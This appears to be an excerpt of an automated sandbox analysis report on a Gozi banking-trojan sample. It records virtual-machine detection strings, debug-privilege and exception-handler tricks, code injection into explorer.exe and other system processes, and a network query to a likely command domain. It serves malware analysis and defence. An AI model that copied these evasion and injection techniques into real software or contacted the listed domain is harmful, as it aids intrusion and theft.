Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000029.00000000.614665708.00000163C4E00000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.487973669.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000012.00000002.422959033.000002BC06C24000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: gozi.exe, 00000002.00000002.327636838.000000000153E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 47_2_03052ECF

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress, 8_2_004012E6
Enables debug privileges
Source: C:\Users\user\Desktop\gozi.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F016AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 8_2_03F016AF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030316AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 47_2_030316AF

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: io.immontyr.com
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write